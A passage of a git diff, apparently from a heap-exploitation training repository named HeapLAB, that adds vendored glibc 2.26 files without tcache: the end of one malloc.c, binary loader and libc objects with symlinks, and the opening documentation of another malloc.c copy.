+      __libc_message ((action & 2) ? (do_abort | do_backtrace) : do_message,
+		      "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.26_no-tcache/ld-2.26.so b/HeapLAB/.glibc/glibc_2.26_no-tcache/ld-2.26.so
new file mode 100755
index 0000000..0f2c0df
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.26_no-tcache/ld-2.26.so differ
diff --git a/HeapLAB/.glibc/glibc_2.26_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.26_no-tcache/ld.so.2
new file mode 120000
index 0000000..82c5fee
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.26.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.26_no-tcache/libc-2.26.so b/HeapLAB/.glibc/glibc_2.26_no-tcache/libc-2.26.so
new file mode 100755
index 0000000..11e0713
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.26_no-tcache/libc-2.26.so differ
diff --git a/HeapLAB/.glibc/glibc_2.26_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.26_no-tcache/libc.so.6
new file mode 120000
index 0000000..898455f
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.26.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.26_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.26_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..54e406b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26_no-tcache/malloc/malloc.c
@@ -0,0 +1,5655 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2017 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
